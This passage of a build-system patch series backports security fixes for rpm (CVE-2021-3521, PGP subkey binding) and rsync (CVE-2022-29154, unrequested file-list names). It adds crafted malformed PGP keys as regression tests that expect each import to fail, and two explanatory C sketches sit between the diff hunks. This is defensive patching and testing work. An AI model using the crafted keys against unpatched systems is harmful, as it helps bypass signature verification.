++ if (pkt->tag == PGPTAG_PUBLIC_SUBKEY)
++ expect = PGPTAG_SIGNATURE;
++ prevtag = pkt->tag;
++
++ i++;
++ p += (pkt->body - pkt->head) + pkt->blen;
+ if (pkttype == PGPTAG_SIGNATURE)
+ break;
++
++ if (alloced <= i) {
++ alloced *= 2;
++ all = xrealloc(all, alloced * sizeof(*all));
++ }
+ }
+
+- rc = (digp && (p == pend)) ? 0 : -1;
++ rc = (digp && (p == pend) && expect == 0) ? 0 : -1;
+
++ free(all);
+ if (ret && rc == 0) {
+ *ret = digp;
+ } else {
+diff --git a/tests/Makefile.am b/tests/Makefile.am
+index b4a2e2e1ce..bc535d2833 100644
+--- a/tests/Makefile.am
++++ b/tests/Makefile.am
+@@ -87,6 +87,9 @@ EXTRA_DIST += data/SPECS/hello-config-buildid.spec
+ EXTRA_DIST += data/SPECS/hello-cd.spec
+ EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.pub
+ EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.secret
++EXTRA_DIST += data/keys/CVE-2021-3521-badbind.asc
++EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig.asc
++EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig-last.asc
+ EXTRA_DIST += data/macros.testfile
+
+ # testsuite voodoo
+diff --git a/tests/data/keys/CVE-2021-3521-badbind.asc b/tests/data/keys/CVE-2021-3521-badbind.asc
+new file mode 100644
+index 0000000000..aea00f9d7a
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-badbind.asc
+@@ -0,0 +1,25 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
++HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
++91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
++eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
++7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
++1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
++c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
++CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
++Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
++BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
++XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
++fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
+++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
++BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
++zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
++iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
++Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
++KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
++L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAE=
++=WCfs
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/data/keys/CVE-2021-3521-nosubsig-last.asc b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+new file mode 100644
+index 0000000000..aea00f9d7a
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+@@ -0,0 +1,25 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
++HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
++91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
++eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
++7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
++1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
++c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
++CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
++Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
++BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
++XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
++fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
+++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
++BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
++zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
++iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
++Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
++KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
++L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAE=
++=WCfs
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/data/keys/CVE-2021-3521-nosubsig.asc b/tests/data/keys/CVE-2021-3521-nosubsig.asc
+new file mode 100644
+index 0000000000..3a2e7417f8
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-nosubsig.asc
+@@ -0,0 +1,37 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++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
++E4XX4jtDmdZPreZALsiB
++=rRop
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/rpmsigdig.at b/tests/rpmsigdig.at
+index 0f8f2b4884..c8b9f139e1 100644
+--- a/tests/rpmsigdig.at
++++ b/tests/rpmsigdig.at
+@@ -240,6 +240,34 @@ gpg(185e6146f00650f8) = 4:185e6146f00650f8-58e63918
+ [])
+ AT_CLEANUP
+
++AT_SETUP([rpmkeys --import invalid keys])
++AT_KEYWORDS([rpmkeys import])
++RPMDB_INIT
++
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-badbind.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-badbind.asc: key 1 import failed.]
++)
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-nosubsig.asc: key 1 import failed.]
++)
++
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig-last.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-nosubsig-last.asc: key 1 import failed.]
++)
++AT_CLEANUP
++
+ # ------------------------------
+ # Test pre-built package verification
+ AT_SETUP([rpmkeys -K <signed> 1])
+
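
For reference, the hunks above leave the public pgpPrtParams() entry point intact, so the new subkey-binding enforcement is triggered simply by parsing a key blob. The sketch below is illustrative only and is not part of the patch; it assumes dearmored OpenPGP packet bytes are already in hand and uses only symbols visible in the diff (pgpPrtParams, pgpDigParamsFree, PGPTAG_PUBLIC_KEY), which rpm exposes via rpm/rpmpgp.h.

    /* Illustrative sketch, not part of the patch: with the change above,
     * a key whose subkey lacks a valid binding signature makes
     * pgpPrtParams() return non-zero, so callers can reject the import. */
    #include <stdint.h>
    #include <rpm/rpmpgp.h>

    static int key_blob_parses(const uint8_t *pkts, size_t pktlen)
    {
        pgpDigParams params = NULL;
        int rc = pgpPrtParams(pkts, pktlen, PGPTAG_PUBLIC_KEY, &params);

        if (rc == 0)
            params = pgpDigParamsFree(params);  /* parsed fine, release it */
        return rc == 0;
    }
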
diff --git a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
index 4029217d08..4d605c8501 100644
--- a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
+++ b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
@@ -24,7 +24,7 @@ HOMEPAGE = "http://www.rpm.org"
LICENSE = "GPL-2.0"
LIC_FILES_CHKSUM = "file://COPYING;md5=c0bf017c0fd1920e6158a333acabfd4a"
-SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
+SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x;protocol=https \
file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \
file://0001-Do-not-read-config-files-from-HOME.patch \
file://0001-When-cross-installing-execute-package-scriptlets-wit.patch \
@@ -44,6 +44,13 @@ SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
file://0001-mono-find-provides-requires-do-not-use-monodis-from-.patch \
file://0001-Rip-out-partial-support-for-unused-MD2-and-RIPEMD160.patch \
file://0001-rpmplugins.c-call-dlerror-prior-to-dlsym.patch \
+ file://0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch \
+ file://CVE-2021-3421.patch \
+ file://CVE-2021-20266.patch \
+ file://CVE-2021-3521-01.patch \
+ file://CVE-2021-3521-02.patch \
+ file://CVE-2021-3521-03.patch \
+ file://CVE-2021-3521.patch \
"
PE = "1"
@@ -60,7 +67,8 @@ export PYTHON_ABI
# OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe
EXTRA_AUTORECONF_append = " --exclude=gnu-configize"
-EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl"
+# Vendor is detected differently on x86 and aarch64 hosts and can feed into target packages
+EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl --with-vendor=pc"
EXTRA_OECONF_append_libc-musl = " --disable-nls"
# --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs
diff --git a/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
new file mode 100644
index 0000000000..b2e02dba97
--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
@@ -0,0 +1,31 @@
+From fabef23bea6e9963c06e218586fda1a823e3c6bf Mon Sep 17 00:00:00 2001
+From: Wayne Davison <wayne@opencoder.net>
+Date: Mon, 8 Aug 2022 21:30:21 -0700
+Subject: [PATCH] Fix --relative when copying an absolute path.
+
+CVE: CVE-2022-29154
+Upstream-Status: Backport [https://github.com/WayneD/rsync/commit/fabef23bea6e9963c06e218586fda1a823e3c6bf]
+Signed-off-by: Matthias Schmitz <matthias.schmitz@port4949.net>
+---
+ exclude.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/exclude.c b/exclude.c
+index 2394023f..ba5ca5a3 100644
+--- a/exclude.c
++++ b/exclude.c
+@@ -434,8 +434,10 @@ void add_implied_include(const char *arg)
+ *p++ = *cp++;
+ break;
+ case '/':
+- if (p[-1] == '/') /* This is safe because of the initial slash. */
++ if (p[-1] == '/') { /* This is safe because of the initial slash. */
++ cp++;
+ break;
++ }
+ if (relative_paths) {
+ filter_rule const *ent;
+ int found = 0;
+--
+2.39.2
+
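
The added cp++ above consumes the duplicate '/' that the loop previously skipped without advancing past, which is what broke --relative copies of absolute paths. A simplified, standalone illustration of the corrected copy behaviour (plain C, not rsync code, assuming the destination buffer is large enough):

    /* Illustrative only: collapse runs of '/' while copying, advancing the
     * source pointer even when a character is dropped; the missing advance
     * is exactly what the one-line fix above restores. */
    static void copy_collapsing_slashes(char *dst, const char *src)
    {
        char *p = dst;
        const char *cp = src;

        *p++ = '/';                     /* mirror the prefixed leading slash */
        while (*cp) {
            if (*cp == '/' && p[-1] == '/') {
                cp++;                   /* skip the redundant slash */
                continue;
            }
            *p++ = *cp++;
        }
        *p = '\0';
    }

    /* copy_collapsing_slashes(buf, "/etc//passwd") leaves "/etc/passwd" in buf */
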
diff --git a/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
new file mode 100644
index 0000000000..61e4e03254
--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
@@ -0,0 +1,334 @@
+From b7231c7d02cfb65d291af74ff66e7d8c507ee871 Mon Sep 17 00:00:00 2001
+From: Wayne Davison <wayne@opencoder.net>
+Date: Sun, 31 Jul 2022 16:55:34 -0700
+Subject: [PATCH] Some extra file-list safety checks.
+
+CVE-2022-29154 rsync: remote arbitrary files write inside the directories of connecting peers
+
+Upstream-Status: Backport from [https://git.samba.org/?p=rsync.git;a=patch;h=b7231c7d02cfb65d291af74ff66e7d8c507ee871]
+CVE: CVE-2022-29154
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ exclude.c | 127 ++++++++++++++++++++++++++++++++++++++++++++++++++++-
+ flist.c | 17 ++++++-
+ io.c | 4 ++
+ main.c | 7 ++-
+ receiver.c | 11 +++--
+ 5 files changed, 158 insertions(+), 8 deletions(-)
+
+diff --git a/exclude.c b/exclude.c
+index 7989fb3..e146e96 100644
+--- a/exclude.c
++++ b/exclude.c
+@@ -26,16 +26,21 @@ extern int am_server;
+ extern int am_sender;
+ extern int eol_nulls;
+ extern int io_error;
++extern int xfer_dirs;
++extern int recurse;
+ extern int local_server;
+ extern int prune_empty_dirs;
+ extern int ignore_perishable;
++extern int relative_paths;
+ extern int delete_mode;
+ extern int delete_excluded;
+ extern int cvs_exclude;
+ extern int sanitize_paths;
+ extern int protocol_version;
++extern int list_only;
+ extern int module_id;
+
++extern char *filesfrom_host;
+ extern char curr_dir[MAXPATHLEN];
+ extern unsigned int curr_dir_len;
+ extern unsigned int module_dirlen;
+@@ -43,8 +48,10 @@ extern unsigned int module_dirlen;
+ filter_rule_list filter_list = { .debug_type = "" };
+ filter_rule_list cvs_filter_list = { .debug_type = " [global CVS]" };
+ filter_rule_list daemon_filter_list = { .debug_type = " [daemon]" };
++filter_rule_list implied_filter_list = { .debug_type = " [implied]" };
+
+ int saw_xattr_filter = 0;
++int trust_sender_filter = 0;
+
+ /* Need room enough for ":MODS " prefix plus some room to grow. */
+ #define MAX_RULE_PREFIX (16)
+@@ -293,6 +300,123 @@ static void add_rule(filter_rule_list *listp, const char *pat, unsigned int pat_
+ }
+ }
+
++/* Each arg the client sends to the remote sender turns into an implied include
++ * that the receiver uses to validate the file list from the sender. */
++void add_implied_include(const char *arg)
++{
++ filter_rule *rule;
++ int arg_len, saw_wild = 0, backslash_cnt = 0;
++ int slash_cnt = 1; /* We know we're adding a leading slash. */
++ const char *cp;
++ char *p;
++ if (relative_paths) {
++ cp = strstr(arg, "/./");
++ if (cp)
++ arg = cp+3;
++ } else {
++ if ((cp = strrchr(arg, '/')) != NULL)
++ arg = cp + 1;
++ }
++ arg_len = strlen(arg);
++ if (arg_len) {
++ if (strpbrk(arg, "*[?")) {
++ /* We need to add room to escape backslashes if wildcard chars are present. */
++ cp = arg;
++ while ((cp = strchr(cp, '\\')) != NULL) {
++ arg_len++;
++ cp++;
++ }
++ saw_wild = 1;
++ }
++ arg_len++; /* Leave room for the prefixed slash */
++ rule = new0(filter_rule);
++ if (!implied_filter_list.head)
++ implied_filter_list.head = implied_filter_list.tail = rule;
++ else {
++ rule->next = implied_filter_list.head;
++ implied_filter_list.head = rule;
++ }
++ rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
++ p = rule->pattern = new_array(char, arg_len + 1);
++ *p++ = '/';
++ cp = arg;
++ while (*cp) {
++ switch (*cp) {
++ case '\\':
++ backslash_cnt++;
++ if (saw_wild)
++ *p++ = '\\';
++ *p++ = *cp++;
++ break;
++ case '/':
++ if (p[-1] == '/') /* This is safe because of the initial slash. */
++ break;
++ if (relative_paths) {
++ filter_rule const *ent;
++ int found = 0;
++ *p = '\0';
++ for (ent = implied_filter_list.head; ent; ent = ent->next) {
++ if (ent != rule && strcmp(ent->pattern, rule->pattern) == 0)
++ found = 1;
++ }
++ if (!found) {
++ filter_rule *R_rule = new0(filter_rule);
++ R_rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
++ R_rule->pattern = strdup(rule->pattern);
++ R_rule->u.slash_cnt = slash_cnt;
++ R_rule->next = implied_filter_list.head;
++ implied_filter_list.head = R_rule;
++ }
++ }
++ slash_cnt++;
++ *p++ = *cp++;
++ break;
++ default:
++ *p++ = *cp++;
++ break;
++ }
++ }
++ *p = '\0';
++ rule->u.slash_cnt = slash_cnt;
++ arg = (const char *)rule->pattern;
++ }
++
++ if (recurse || xfer_dirs) {
++ /* Now create a rule with an added "/" & "**" or "*" at the end */
++ rule = new0(filter_rule);
++ if (recurse)
++ rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD | FILTRULE_WILD2;
++ else
++ rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD;
++ /* A +4 in the len leaves enough room for / * * \0 or / * \0 \0 */
++ if (!saw_wild && backslash_cnt) {
++ /* We are appending a wildcard, so now the backslashes need to be escaped. */
++ p = rule->pattern = new_array(char, arg_len + backslash_cnt + 3 + 1);
++ cp = arg;
++ while (*cp) {
++ if (*cp == '\\')
++ *p++ = '\\';
++ *p++ = *cp++;
++ }
++ } else {
++ p = rule->pattern = new_array(char, arg_len + 3 + 1);
++ if (arg_len) {
++ memcpy(p, arg, arg_len);
++ p += arg_len;
++ }
++ }
++ if (p[-1] != '/')
++ *p++ = '/';
++ *p++ = '*';
++ if (recurse)
++ *p++ = '*';
++ *p = '\0';
++ rule->u.slash_cnt = slash_cnt + 1;
++ rule->next = implied_filter_list.head;
++ implied_filter_list.head = rule;
++ }
++}
++
+ /* This frees any non-inherited items, leaving just inherited items on the list. */
+ static void pop_filter_list(filter_rule_list *listp)
+ {
+@@ -721,7 +845,7 @@ static void report_filter_result(enum logcode code, char const *name,
+ : name_flags & NAME_IS_DIR ? "directory"
+ : "file";
+ rprintf(code, "[%s] %sing %s %s because of pattern %s%s%s\n",
+- w, actions[*w!='s'][!(ent->rflags & FILTRULE_INCLUDE)],
++ w, actions[*w=='g'][!(ent->rflags & FILTRULE_INCLUDE)],
+ t, name, ent->pattern,
+ ent->rflags & FILTRULE_DIRECTORY ? "/" : "", type);
+ }
+@@ -894,6 +1018,7 @@ static filter_rule *parse_rule_tok(const char **rulestr_ptr,
+ }
+ switch (ch) {
+ case ':':
++ trust_sender_filter = 1;
+ rule->rflags |= FILTRULE_PERDIR_MERGE
+ | FILTRULE_FINISH_SETUP;
+ /* FALL THROUGH */
+diff --git a/flist.c b/flist.c
+index 499440c..630d685 100644
+--- a/flist.c
++++ b/flist.c
+@@ -70,6 +70,7 @@ extern int need_unsorted_flist;
+ extern int sender_symlink_iconv;
+ extern int output_needs_newline;
+ extern int sender_keeps_checksum;
++extern int trust_sender_filter;
+ extern int unsort_ndx;
+ extern uid_t our_uid;
+ extern struct stats stats;
+@@ -80,8 +81,7 @@ extern char curr_dir[MAXPATHLEN];
+
+ extern struct chmod_mode_struct *chmod_modes;
+
+-extern filter_rule_list filter_list;
+-extern filter_rule_list daemon_filter_list;
++extern filter_rule_list filter_list, implied_filter_list, daemon_filter_list;
+
+ #ifdef ICONV_OPTION
+ extern int filesfrom_convert;
+@@ -904,6 +904,19 @@ static struct file_struct *recv_file_entry(int f, struct file_list *flist, int x
+ exit_cleanup(RERR_UNSUPPORTED);
+ }
+
++ if (*thisname != '.' || thisname[1] != '\0') {
++ int filt_flags = S_ISDIR(mode) ? NAME_IS_DIR : NAME_IS_FILE;
++ if (!trust_sender_filter /* a per-dir filter rule means we must trust the sender's filtering */
++ && filter_list.head && check_filter(&filter_list, FINFO, thisname, filt_flags) < 0) {
++ rprintf(FERROR, "ERROR: rejecting excluded file-list name: %s\n", thisname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
++ if (implied_filter_list.head && check_filter(&implied_filter_list, FINFO, thisname, filt_flags) <= 0) {
++ rprintf(FERROR, "ERROR: rejecting unrequested file-list name: %s\n", thisname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
++ }
++
+ if (inc_recurse && S_ISDIR(mode)) {
+ if (one_file_system) {
+ /* Room to save the dir's device for -x */
+diff --git a/io.c b/io.c
+index c04dbd5..698a7da 100644
+--- a/io.c
++++ b/io.c
+@@ -415,6 +415,7 @@ static void forward_filesfrom_data(void)
+ while (s != eob) {
+ if (*s++ == '\0') {
+ ff_xb.len = s - sob - 1;
++ add_implied_include(sob);
+ if (iconvbufs(ic_send, &ff_xb, &iobuf.out, flags) < 0)
+ exit_cleanup(RERR_PROTOCOL); /* impossible? */
+ write_buf(iobuf.out_fd, s-1, 1); /* Send the '\0'. */
+@@ -446,9 +447,12 @@ static void forward_filesfrom_data(void)
+ char *f = ff_xb.buf + ff_xb.pos;
+ char *t = ff_xb.buf;
+ char *eob = f + len;
++ char *cur = t;
+ /* Eliminate any multi-'\0' runs. */
+ while (f != eob) {
+ if (!(*t++ = *f++)) {
++ add_implied_include(cur);
++ cur = t;
+ while (f != eob && *f == '\0')
+ f++;
+ }
+diff --git a/main.c b/main.c
+index ee9630f..6ec56e7 100644
+--- a/main.c
++++ b/main.c
+@@ -78,6 +78,7 @@ extern BOOL flist_receiving_enabled;
+ extern BOOL shutting_down;
+ extern int backup_dir_len;
+ extern int basis_dir_cnt;
++extern int trust_sender_filter;
+ extern struct stats stats;
+ extern char *stdout_format;
+ extern char *logfile_format;
+@@ -93,7 +94,7 @@ extern char curr_dir[MAXPATHLEN];
+ extern char backup_dir_buf[MAXPATHLEN];
+ extern char *basis_dir[MAX_BASIS_DIRS+1];
+ extern struct file_list *first_flist;
+-extern filter_rule_list daemon_filter_list;
++extern filter_rule_list daemon_filter_list, implied_filter_list;
+
+ uid_t our_uid;
+ gid_t our_gid;
+@@ -534,6 +535,7 @@ static pid_t do_cmd(char *cmd, char *machine, char *user, char **remote_argv, in
+ #ifdef ICONV_CONST
+ setup_iconv();
+ #endif
++ trust_sender_filter = 1;
+ } else if (local_server) {
+ /* If the user didn't request --[no-]whole-file, force
+ * it on, but only if we're not batch processing. */
+@@ -1358,6 +1360,8 @@ static int start_client(int argc, char *argv[])
+ char *dummy_host;
+ int dummy_port = rsync_port;
+ int i;
++ if (filesfrom_fd < 0)
++ add_implied_include(remote_argv[0]);
+ /* For remote source, any extra source args must have either
+ * the same hostname or an empty hostname. */
+ for (i = 1; i < remote_argc; i++) {
+@@ -1381,6 +1385,7 @@ static int start_client(int argc, char *argv[])
+ if (!rsync_port && !*arg) /* Turn an empty arg into a dot dir. */
+ arg = ".";
+ remote_argv[i] = arg;
++ add_implied_include(arg);
+ }
+ }
+
+diff --git a/receiver.c b/receiver.c
+index d6a48f1..c0aa893 100644
+--- a/receiver.c
++++ b/receiver.c
+@@ -577,10 +577,13 @@ int recv_files(int f_in, int f_out, char *local_name)
+ if (DEBUG_GTE(RECV, 1))
+ rprintf(FINFO, "recv_files(%s)\n", fname);
+
+- if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')
+- && check_filter(&daemon_filter_list, FLOG, fname, 0) < 0) {
+- rprintf(FERROR, "attempt to hack rsync failed.\n");
+- exit_cleanup(RERR_PROTOCOL);
++ if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')) {
++ int filt_flags = S_ISDIR(file->mode) ? NAME_IS_DIR : NAME_IS_FILE;
++ if (check_filter(&daemon_filter_list, FLOG, fname, filt_flags) < 0) {
++ rprintf(FERROR, "ERROR: rejecting file transfer request for daemon excluded file: %s\n",
++ fname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
+ }
+
+ #ifdef SUPPORT_XATTRS
+--
+2.30.2
+
diff --git a/meta/recipes-devtools/rsync/rsync_3.1.3.bb b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
index 152ff02a25..c744503227 100644
--- a/meta/recipes-devtools/rsync/rsync_3.1.3.bb
+++ b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
@@ -1,5 +1,6 @@
SUMMARY = "File synchronization tool"
HOMEPAGE = "http://rsync.samba.org/"
+DESCRIPTION = "rsync is an open source utility that provides fast incremental file transfer."
BUGTRACKER = "http://rsync.samba.org/bugzilla.html"
SECTION = "console/network"
# GPLv2+ (<< 3.0.0), GPLv3+ (>= 3.0.0)
